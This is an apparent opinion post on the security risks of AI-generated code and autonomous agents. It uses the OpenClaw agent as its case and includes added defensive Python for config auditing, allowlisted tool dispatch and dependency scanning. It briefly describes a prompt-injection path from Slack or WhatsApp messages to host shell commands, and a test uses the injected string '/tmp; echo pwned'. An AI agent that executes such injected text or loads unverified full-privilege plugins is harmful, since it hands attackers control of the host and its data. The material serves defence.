By Lawrence Yandrofski | AI Financial Services, Executive Interim Manager X-PM Asia
Enterprises, including financial institutions, are seeing a rush to modernize their legacy systems, or to add new functions using Agentic AI.
This creates speed, but it is also introducing a dangerous operational habit: developers let LLMs generate code from high-level intent without doing the engineering due diligence that any other code would get. Velocity improves in the short term, but the cost is massive technical debt, as enterprises accumulate piles of autonomous code that nobody can explain or secure.
AI-generated code should therefore be treated not as trusted software but as untrusted input. If we do not enforce architectural standards for it now, we are handing the keys over to Shadow AI.
To see where this leads, look at the “OpenClaw” (Clawbot) incident. This is an open-source agent built almost entirely via AI prompts. It functions like a highly capable employee, but it completely lacks a security immune system.
Microsoft Security Research has been blunt about this, recommending that it not be run on an enterprise workstation. Unlike standard software, agents produced by such tools hold persistent admin credentials and unrestricted internet access. They can change their own state and bypass the usual authentication steps.
OpenClaw exposes three security risks that are typical of this new wave of AI agent generators:
- It binds to all network interfaces (0.0.0.0) without default authentication, exposing internal tools to the public web.
- It is vulnerable to prompt injection, meaning it will translate untrusted messages from connected sources such as Slack or WhatsApp directly into shell commands on the host OS.
- It accepts unverified community plugins (“skills”) with full privileges, which is an open invitation for supply chain malware.
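The three risks above are all visible before deployment if someone looks. The following is an added example, not code from OpenClaw or from Microsoft's research: a small pre-deployment audit of an agent's configuration that flags a listener bound to every interface without authentication and plugins that are unsigned or run with full privileges, plus an allowlisted tool dispatcher that never hands untrusted chat text to a shell. The config keys, tool names and the two sample configs are constructed for illustration.

```python
"""Added example (not OpenClaw's own code): audit an agent config for the
three risk patterns named in the article, and dispatch tool calls through an
allowlist instead of a shell. Config keys and tool names are assumptions."""
import ipaddress
import re
from typing import Callable, Dict, List, Optional, Tuple

# Constructed config in the shape a generated agent might ship with.
WEAK_CONFIG = {
    "listen": "0.0.0.0:8080",
    "auth": {"required": False},
    "plugins": [{"name": "calendar-sync", "signature": None, "privileges": "full"}],
}

# Constructed hardened counterpart (signature value is a placeholder).
HARDENED_CONFIG = {
    "listen": "127.0.0.1:8080",
    "auth": {"required": True, "scheme": "bearer"},
    "plugins": [{"name": "calendar-sync", "signature": "sha256:PLACEHOLDER",
                 "privileges": "read-only"}],
}


def audit_config(cfg: dict) -> List[str]:
    """Return human-readable findings; an empty list means no pattern matched."""
    findings = []
    host, _, _port = cfg.get("listen", "").rpartition(":")
    host = host.strip("[]")  # tolerate "[::]:8080"
    try:
        unspecified = ipaddress.ip_address(host).is_unspecified  # 0.0.0.0 or ::
    except ValueError:
        unspecified = host in ("", "*")
    auth_required = cfg.get("auth", {}).get("required", False)
    if unspecified and not auth_required:
        findings.append("binds all interfaces without authentication")
    elif unspecified:
        findings.append("binds all interfaces (confirm a reverse proxy or firewall fronts it)")
    for plugin in cfg.get("plugins", []):
        if not plugin.get("signature"):
            findings.append(f"plugin {plugin['name']!r} has no verified signature")
        if plugin.get("privileges") == "full":
            findings.append(f"plugin {plugin['name']!r} runs with full privileges")
    return findings


# Allowlisted tools: intent name -> (fixed argv prefix, argument validator).
# The untrusted message only ever becomes an *argument* for subprocess.run(argv)
# with shell=False; it is never interpreted by a shell. Contrast with the weak
# pattern subprocess.run(message, shell=True), which is exactly what the
# prompt-injection risk above describes.
_SAFE_ARG = re.compile(r"[A-Za-z0-9_./-]{1,255}")


def _is_safe_path(arg: str) -> bool:
    return bool(_SAFE_ARG.fullmatch(arg)) and ".." not in arg and not arg.startswith("-")


TOOLS: Dict[str, Tuple[List[str], Callable[[str], bool]]] = {
    "list_dir": (["ls", "-l"], _is_safe_path),
    "word_count": (["wc", "-w"], _is_safe_path),
}


def plan_command(intent: str, arg: str) -> Optional[List[str]]:
    """Return argv for an allowlisted intent, or None when the call must be refused."""
    spec = TOOLS.get(intent)
    if spec is None:
        return None  # unknown intent, including anything an injected message invents
    argv_prefix, validate = spec
    if not validate(arg):
        return None
    return [*argv_prefix, arg]


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_config(cfg) or "clean")
    print(plan_command("list_dir", "/tmp"))
    print(plan_command("list_dir", "/tmp; echo pwned"))
    print(plan_command("run_shell", "whoami"))
```

The two halves address different layers: the audit catches the deployment-time misconfiguration, while the dispatcher removes the shell from the path between a connected chat source and the host, so an injected instruction can at most name an allowlisted tool with a validated argument.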
To stay compliant with frameworks like Singapore’s IMDA and CSA guidelines, enterprises need to move past the idea of “Active Liveness” and enforce a strict “Human-on-the-Loop” standard, including:
- Implement mandatory Senior Peer Review. The rule is simple: If the human reviewer cannot explain the logic behind the AI-generated code, it gets rejected. Treat it as technical debt.
- Autonomous runtimes do not belong on corporate laptops. All testing happens in isolated, non-persistent Virtual Machines (VMs) with segmented credentials.
- The CI/CD pipeline needs automated scanning to catch “hallucinated dependencies” before they are merged, to stop supply chain poisoning at the source.
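The third control above is the easiest to automate. The following is an added example, not a tool from the article or from any vendor: a CI gate that parses a requirements file, normalises each package name, and refuses the merge if a name is absent from a registry snapshot (a likely hallucinated dependency) or sits one edit away from a known package (a lookalike that a typosquatter could register). The registry snapshot and the requirements file are constructed for the example; in a real pipeline the snapshot would come from an internal mirror or the package index.

```python
"""Added example (not the article's own code): a CI gate for hallucinated and
lookalike dependencies. KNOWN_PACKAGES and REQUIREMENTS_TXT are constructed."""
import re
from typing import Dict, List, Set

# Constructed snapshot of package names the organisation's mirror knows about.
KNOWN_PACKAGES: Set[str] = {"requests", "numpy", "pandas", "cryptography", "pyjwt", "boto3"}

# Constructed requirements.txt as an LLM might emit it: real names, one
# plausible-but-nonexistent helper, and one lookalike of a real name.
REQUIREMENTS_TXT = """\
requests==2.31.0
numpy>=1.26
# helper the model "remembered"
pandas-secure-loader==1.2.0
requets==2.31.0
boto3
"""

_NAME_RE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)")


def normalize(name: str) -> str:
    """PEP 503 name normalisation: case-fold and collapse runs of -, _ and . to -."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_requirements(text: str) -> List[str]:
    """Extract normalised project names, ignoring comments, blanks and pip options."""
    names = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue
        match = _NAME_RE.match(line)
        if match:
            names.append(normalize(match.group(1)))
    return names


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot one-character lookalikes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def scan(requirements: str, known: Set[str]) -> Dict[str, str]:
    """Map each requested package to a verdict: ok, lookalike of X, or unknown."""
    known_norm = {normalize(k) for k in known}
    verdicts: Dict[str, str] = {}
    for name in parse_requirements(requirements):
        if name in known_norm:
            verdicts[name] = "ok"
            continue
        near = sorted(k for k in known_norm if edit_distance(name, k) <= 1)
        verdicts[name] = (f"lookalike of {near[0]}" if near
                          else "unknown package (possible hallucination)")
    return verdicts


def gate(requirements: str, known: Set[str]) -> bool:
    """True when the merge may proceed: every dependency resolved to a known name."""
    return all(v == "ok" for v in scan(requirements, known).values())


if __name__ == "__main__":
    for name, verdict in scan(REQUIREMENTS_TXT, KNOWN_PACKAGES).items():
        print(f"{name:24} {verdict}")
    print("merge allowed:", gate(REQUIREMENTS_TXT, KNOWN_PACKAGES))
```

Run as a pipeline step, a `False` from `gate` fails the build, which is the point: an unknown name is blocked before anyone runs `pip install` on it, and a lookalike is surfaced to the reviewer rather than silently resolved from the public index.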